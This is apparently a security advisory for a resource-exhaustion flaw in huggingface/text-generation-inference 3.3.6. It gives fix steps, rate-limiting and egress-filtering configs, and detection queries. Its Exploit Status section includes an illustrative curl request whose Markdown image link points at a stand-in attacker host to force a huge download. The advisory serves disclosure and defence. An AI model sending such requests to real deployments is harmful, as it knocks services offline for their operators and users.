CVE-2026-0599
📋 TL;DR
This vulnerability in huggingface/text-generation-inference allows unauthenticated attackers to trigger resource exhaustion by exploiting unbounded external image fetching. Attackers can send malicious Markdown image links that cause the system to download large files, consuming memory, CPU, and network bandwidth. All deployments using version 3.3.6 with VLM mode enabled are affected.
💻 Affected Systems
- huggingface/text-generation-inference
⚠️ Risk & Real-World Impact
Worst Case
Complete system crash due to memory exhaustion, network bandwidth saturation, and CPU overutilization, potentially causing denial of service and data loss.
Likely Case
Service degradation or temporary unavailability due to resource exhaustion, requiring system restart and cleanup.
If Mitigated
Minimal impact if proper resource limits and authentication are configured, though some performance degradation may still occur.
🎯 Exploit Status
Exploitation requires only sending HTTP requests containing malicious Markdown image links; no authentication or special privileges are needed. A sketch of such a request follows.
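For illustration only, a request of this kind might look like the sketch below. The host, port, endpoint, and payload shape assume a standard TGI `/generate` deployment with a vision-language model loaded, and the image URL is a placeholder; the exact request depends on how the server is exposed.

```bash
# Illustrative sketch only -- host, port, payload shape, and URL are assumptions.
# A prompt containing a Markdown image link that points at a very large remote
# file causes the server to fetch that file before inference, consuming memory,
# CPU, and network bandwidth.
curl -s http://tgi-host:8080/generate \
  -X POST \
  -H 'Content-Type: application/json' \
  -d '{
        "inputs": "Describe this image: ![](http://attacker.example/huge-file.bin)",
        "parameters": {"max_new_tokens": 16}
      }'
```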
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 3.3.7
Vendor Advisory: https://github.com/huggingface/text-generation-inference/commit/24ee40d143d8d046039f12f76940a85886cbe152
Restart Required: Yes
Instructions:
1. Stop the text-generation-inference service.
2. Update to version 3.3.7 using your package manager or a direct installation (see the Docker-based sketch below).
3. Restart the service.
4. Verify the update was successful.
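For Docker-based deployments, the upgrade might look like the following sketch. The container name, model ID, volume path, port mapping, and GPU flag are placeholders; the image name and tag follow the project's usual GHCR publishing scheme and should be checked against the release notes.

```bash
# Sketch of a Docker-based upgrade; adapt names, paths, and hardware flags to your setup.
docker stop tgi && docker rm tgi                                   # 1. stop the service
docker pull ghcr.io/huggingface/text-generation-inference:3.3.7    # 2. fetch the patched image
docker run -d --name tgi --gpus all -p 8080:80 \
  -v /data/models:/data \
  ghcr.io/huggingface/text-generation-inference:3.3.7 \
  --model-id <your-model-id>                                       # 3. restart on the patched version
curl -s http://localhost:8080/info | grep -i version               # 4. verify the running version
```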
🔧 Temporary Workarounds
Disable VLM Mode (applies to: all platforms)
Disable Vision-Language Model (VLM) mode so that Markdown image links in prompts are not processed.
Set the relevant environment variable or configuration option for your deployment to disable VLM features.
Implement Rate Limiting (applies to: Linux)
Add rate limiting in front of the service to slow repeated exploitation attempts.
Configure a reverse proxy (nginx/Apache) with rate-limiting rules, as in the sketch below.
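A minimal nginx rate-limiting sketch is shown below, written as a shell snippet that drops a config file into place. The zone size, request rate, burst, upstream address, and file path are illustrative and should be tuned for your traffic; TLS directives are omitted for brevity.

```bash
# Sketch of nginx rate limiting in front of the inference endpoint.
# Zone size, rate, burst, and upstream address are illustrative values.
cat > /etc/nginx/conf.d/tgi-ratelimit.conf <<'EOF'
limit_req_zone $binary_remote_addr zone=tgi_limit:10m rate=5r/s;

server {
    listen 80;
    server_name tgi.example.internal;

    location / {
        limit_req zone=tgi_limit burst=10 nodelay;
        proxy_pass http://127.0.0.1:8080;
    }
}
EOF
nginx -t && systemctl reload nginx   # validate the config and apply it
```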
🧯 If You Can't Patch
- Implement strict network egress filtering to block external HTTP requests from the service
- Deploy resource limits (memory, CPU) and monitoring to detect and mitigate exploitation attempts (a sketch of both controls follows below)
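A rough sketch of both controls is shown below, assuming a Docker deployment with iptables-based host firewalling. The container IP, allowlist subnet, container name, and limit values are placeholders for your environment.

```bash
# Egress filtering sketch using Docker's DOCKER-USER chain: allow the container's
# outbound traffic only to an internal subnet and drop everything else.
iptables -I DOCKER-USER -s 172.17.0.5 -d 10.0.0.0/8 -j ACCEPT    # internal services only
iptables -I DOCKER-USER -s 172.17.0.5 ! -d 10.0.0.0/8 -j DROP    # drop all other egress

# Resource limit sketch: cap memory and CPU so a fetch-triggered spike degrades
# the service rather than taking down the whole host.
docker update --memory 16g --memory-swap 16g --cpus 8 tgi
```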
🔍 How to Verify
Check if Vulnerable:
Check if running version 3.3.6 of huggingface/text-generation-inference with VLM mode enabled
Check Version:
docker inspect <container_name> | grep -i version (for container deployments), or check the output of your package manager
Verify Fix Applied:
Confirm the version is 3.3.7 or higher and test that external image fetching is properly bounded (one way to check the running version is shown below)
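One way to check the running version is to query the server's info endpoint, assuming the standard TGI HTTP API is reachable; the host and port are placeholders, and the exact field name may vary between releases.

```bash
# Query the running server for its reported version; anything below 3.3.7
# should be treated as vulnerable. Host/port are placeholders.
curl -s http://localhost:8080/info | python3 -c \
  'import sys, json; print(json.load(sys.stdin).get("version"))'
```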
📡 Detection & Monitoring
Log Indicators:
- Unusually large HTTP GET requests to external domains
- Memory usage spikes
- CPU utilization spikes
- Multiple failed requests due to token limits
Network Indicators:
- Outbound HTTP traffic to unusual domains
- Large data downloads from external sources
- Increased network bandwidth usage
SIEM Query:
source="text-generation-inference" AND http_method="GET" AND (url CONTAINS "http://" OR url CONTAINS "https://") AND bytes_transferred > 1000000
(pseudo-query; adapt field names and operators to your SIEM's syntax)
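Where no SIEM is available, a lightweight host-side check along these lines can surface unexpected egress. The process-name match and the private-address filter are assumptions to adapt; for containerized deployments with their own network namespace, run the check inside the container (for example via docker exec or nsenter) rather than on the host.

```bash
# Quick egress check: list established outbound connections owned by TGI
# processes and flag peers outside private (RFC 1918 / loopback) ranges.
# Process-name match and address filter are assumptions; adjust both.
ss -tnp | grep ESTAB | grep 'text-generation' \
  | awk '{print $5}' \
  | grep -vE '^(10\.|192\.168\.|172\.(1[6-9]|2[0-9]|3[01])\.|127\.)' \
  && echo "WARNING: TGI has an established connection to a non-private address"
```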